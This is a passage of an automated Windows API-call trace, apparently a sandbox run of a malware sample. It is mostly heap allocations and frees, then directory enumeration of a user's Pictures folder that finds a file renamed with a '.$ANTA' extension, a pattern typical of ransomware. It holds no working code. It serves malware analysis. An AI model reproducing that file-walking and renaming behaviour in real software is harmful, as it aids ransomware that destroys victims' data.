RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f50 [0095.998] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca118 [0095.999] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24b0 [0095.999] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca118 | out: hHeap=0x1780000) returned 1 [0095.999] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca148 [0095.999] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0095.999] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfce8 [0095.999] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca160 [0095.999] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2360 [0095.999] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca160 | out: hHeap=0x1780000) returned 1 [0095.999] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf900 [0095.999] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca100 [0095.999] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca118 [0095.999] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23d0 [0095.999] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca118 | out: hHeap=0x1780000) returned 1 [0095.999] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca118 [0095.999] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23d0 | out: hHeap=0x1780000) returned 1 [0095.999] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8d8 [0095.999] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f08 [0095.999] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23d0 [0095.999] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f08 | out: hHeap=0x1780000) returned 1 [0095.999] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfbf8 [0095.999] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f20 [0095.999] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca160 [0095.999] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23e0 [0096.000] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca160 | out: hHeap=0x1780000) returned 1 [0096.000] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f38 [0096.000] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23e0 | out: hHeap=0x1780000) returned 1 [0096.000] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc70 [0096.000] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca160 [0096.000] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24b0 [0096.000] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca160 | out: hHeap=0x1780000) returned 1 [0096.000] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9c8 [0096.000] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca160 [0096.000] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f08 [0096.000] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23e0 [0096.000] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f08 | out: hHeap=0x1780000) returned 1 [0096.000] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f08 [0096.000] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23e0 | out: hHeap=0x1780000) returned 1 [0096.000] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0096.000] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23e0 [0096.000] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc48 [0096.000] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f68 [0096.000] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24f0 [0096.000] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3b8 [0096.000] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24f0 | out: hHeap=0x1780000) returned 1 [0096.000] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca358 [0096.000] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2410 [0096.001] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca478 [0096.001] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2410 | out: hHeap=0x1780000) returned 1 [0096.001] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1a8 [0096.001] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24c0 [0096.001] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca310 [0096.001] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24c0 | out: hHeap=0x1780000) returned 1 [0096.001] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca208 [0096.001] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2410 [0096.001] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca220 [0096.001] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca208 | out: hHeap=0x1780000) returned 1 [0096.001] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8ac8 [0096.001] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9218 [0096.001] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24c0 [0096.001] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca208 [0096.001] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24f0 [0096.001] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0096.001] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2550 [0096.001] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0096.001] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8d98 [0096.001] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8d98 | out: hHeap=0x1780000) returned 1 [0096.001] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0096.002] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca208 | out: hHeap=0x1780000) returned 1 [0096.002] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24f0 | out: hHeap=0x1780000) returned 1 [0096.002] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca208 [0096.002] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca220 | out: hHeap=0x1780000) returned 1 [0096.002] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8ac8 | out: hHeap=0x1780000) returned 1 [0096.002] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2410 | out: hHeap=0x1780000) returned 1 [0096.002] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3b8 | out: hHeap=0x1780000) returned 1 [0096.002] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f68 | out: hHeap=0x1780000) returned 1 [0096.002] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca478 | out: hHeap=0x1780000) returned 1 [0096.002] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca358 | out: hHeap=0x1780000) returned 1 [0096.002] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca310 | out: hHeap=0x1780000) returned 1 [0096.002] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1a8 | out: hHeap=0x1780000) returned 1 [0096.002] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc48 | out: hHeap=0x1780000) returned 1 [0096.002] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2410 [0096.002] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0096.002] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca478 [0096.002] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x90) returned 0x4050e78 [0096.002] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9218 | out: hHeap=0x1780000) returned 1 [0096.002] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca478 | out: hHeap=0x1780000) returned 1 [0096.002] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0096.002] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2410 | out: hHeap=0x1780000) returned 1 [0096.002] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23e0 | out: hHeap=0x1780000) returned 1 [0096.002] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca208 | out: hHeap=0x1780000) returned 1 [0096.002] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0096.003] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23e0 [0096.003] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2410 [0096.003] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca310 [0096.003] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24f0 [0096.003] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796ee8 [0096.003] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0096.003] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca310 | out: hHeap=0x1780000) returned 1 [0096.003] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24f0 | out: hHeap=0x1780000) returned 1 [0096.003] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0096.003] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ee8 | out: hHeap=0x1780000) returned 1 [0096.003] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2410 | out: hHeap=0x1780000) returned 1 [0096.003] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23e0 | out: hHeap=0x1780000) returned 1 [0096.003] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0096.003] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23e0 [0096.003] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23e0 | out: hHeap=0x1780000) returned 1 [0096.003] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0096.003] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24f0 [0096.003] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca310 [0096.003] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23e0 [0096.003] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca478 [0096.003] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2410 [0096.003] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0096.003] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796ee8 [0096.004] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca310 | out: hHeap=0x1780000) returned 1 [0096.004] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca478 | out: hHeap=0x1780000) returned 1 [0096.004] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2410 | out: hHeap=0x1780000) returned 1 [0096.004] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ee8 | out: hHeap=0x1780000) returned 1 [0096.004] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0096.004] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23e0 | out: hHeap=0x1780000) returned 1 [0096.004] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24f0 | out: hHeap=0x1780000) returned 1 [0096.004] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0096.004] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23e0 [0096.004] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24f0 [0096.004] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa68 [0096.004] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca208 [0096.004] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2410 [0096.004] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca358 [0096.004] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2410 | out: hHeap=0x1780000) returned 1 [0096.004] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\cLIkSZ\\" (normalized: "c:\\users\\fd1hvy\\pictures\\cliksz")) returned 0x10 [0096.004] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca358 | out: hHeap=0x1780000) returned 1 [0096.004] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca208 | out: hHeap=0x1780000) returned 1 [0096.004] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa68 | out: hHeap=0x1780000) returned 1 [0096.004] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24f0 | out: hHeap=0x1780000) returned 1 [0096.005] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23e0 | out: hHeap=0x1780000) returned 1 [0096.005] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0096.005] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23e0 [0096.005] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9a0 [0096.005] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca310 [0096.005] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2410 [0096.005] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca208 [0096.005] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2410 | out: hHeap=0x1780000) returned 1 [0096.005] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca358 [0096.005] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24f0 [0096.005] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3b8 [0096.005] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24f0 | out: hHeap=0x1780000) returned 1 [0096.005] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca478 [0096.005] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2410 [0096.005] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca1a8 [0096.005] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1a8 | out: hHeap=0x1780000) returned 1 [0096.005] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca478 | out: hHeap=0x1780000) returned 1 [0096.005] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2410 | out: hHeap=0x1780000) returned 1 [0096.005] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca208 | out: hHeap=0x1780000) returned 1 [0096.005] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca310 | out: hHeap=0x1780000) returned 1 [0096.005] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3b8 | out: hHeap=0x1780000) returned 1 [0096.005] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca358 | out: hHeap=0x1780000) returned 1 [0096.006] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9a0 | out: hHeap=0x1780000) returned 1 [0096.006] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23e0 | out: hHeap=0x1780000) returned 1 [0096.006] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0096.006] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23e0 [0096.006] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2410 [0096.006] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24f0 [0096.006] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0096.006] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e48 [0096.006] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0096.006] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e28 [0096.006] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0096.006] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e28 | out: hHeap=0x1780000) returned 1 [0096.006] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25e0 [0096.006] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e88 [0096.006] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0096.006] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0096.006] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0096.006] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24f0 | out: hHeap=0x1780000) returned 1 [0096.006] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e48 | out: hHeap=0x1780000) returned 1 [0096.006] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2410 | out: hHeap=0x1780000) returned 1 [0096.006] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23e0 | out: hHeap=0x1780000) returned 1 [0096.006] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0096.006] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa68 [0096.006] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca358 [0096.007] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23e0 [0096.007] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca478 [0096.007] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3b8 [0096.007] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24f0 [0096.007] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3b8 | out: hHeap=0x1780000) returned 1 [0096.007] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb80 [0096.007] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3b8 [0096.007] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2410 [0096.007] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca310 [0096.007] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0096.007] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0096.007] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1a8 [0096.007] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0096.007] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x436a608 [0096.007] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1a8 | out: hHeap=0x1780000) returned 1 [0096.008] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0096.008] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0096.008] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2410 | out: hHeap=0x1780000) returned 1 [0096.008] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\cLIkSZ\\*", lpFindFileData=0x144ea50 | out: lpFindFileData=0x144ea50*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd45bd980, ftCreationTime.dwHighDateTime=0x1d5e6c6, ftLastAccessTime.dwLowDateTime=0x55a9b2d, ftLastAccessTime.dwHighDateTime=0x1d69b3f, ftLastWriteTime.dwLowDateTime=0x55a9b2d, ftLastWriteTime.dwHighDateTime=0x1d69b3f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x43ca310, cFileName=".", cAlternateFileName="")) returned 0x41ac640 [0096.008] FindNextFileW (in: hFindFile=0x41ac640, lpFindFileData=0x144ea50 | out: lpFindFileData=0x144ea50*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd45bd980, ftCreationTime.dwHighDateTime=0x1d5e6c6, ftLastAccessTime.dwLowDateTime=0x55a9b2d, ftLastAccessTime.dwHighDateTime=0x1d69b3f, ftLastWriteTime.dwLowDateTime=0x55a9b2d, ftLastWriteTime.dwHighDateTime=0x1d69b3f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x43ca310, cFileName="..", cAlternateFileName="")) returned 1 [0096.008] FindNextFileW (in: hFindFile=0x41ac640, lpFindFileData=0x144ea50 | out: lpFindFileData=0x144ea50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2fecd25, ftCreationTime.dwHighDateTime=0x1d69b3f, ftLastAccessTime.dwLowDateTime=0x2fecd25, ftLastAccessTime.dwHighDateTime=0x1d69b3f, ftLastWriteTime.dwLowDateTime=0x3144113, ftLastWriteTime.dwHighDateTime=0x1d69b3f, nFileSizeHigh=0x0, nFileSizeLow=0x460, dwReserved0=0x0, dwReserved1=0x43ca310, cFileName="-3KPTEtzyngOb.bmp.$ANTA", cAlternateFileName="-3KPTE~1.$AN")) returned 1 [0096.008] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd10 [0096.008] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1a8 [0096.008] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2410 [0096.008] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1a8 | out: hHeap=0x1780000) returned 1 [0096.008] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391d20 [0096.008] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x436a608 | out: hHeap=0x1780000) returned 1 [0096.008] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0096.009] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca310 | out: hHeap=0x1780000) returned 1 [0096.009] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3b8 | out: hHeap=0x1780000) returned 1 [0096.009] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb80 | out: hHeap=0x1780000) returned 1 [0096.009] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24f0 | out: hHeap=0x1780000) returned 1 [0096.009] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0096.009] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24f0 [0096.009] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43ea2e0 [0096.009] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2590 [0096.009] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea2e0 | out: hHeap=0x1780000) returned 1 [0096.009] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0096.009] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24f0 | out: hHeap=0x1780000) returned 1 [0096.009] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0096.009] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24f0 [0096.009] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24f0 | out: hHeap=0x1780000) returned 1 [0096.009] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac600 [0096.009] PeekMessageW (in: lpMsg=0x144f004, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f004) returned 0 [0096.009] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24f0 [0096.009] RtlAllocateHeap 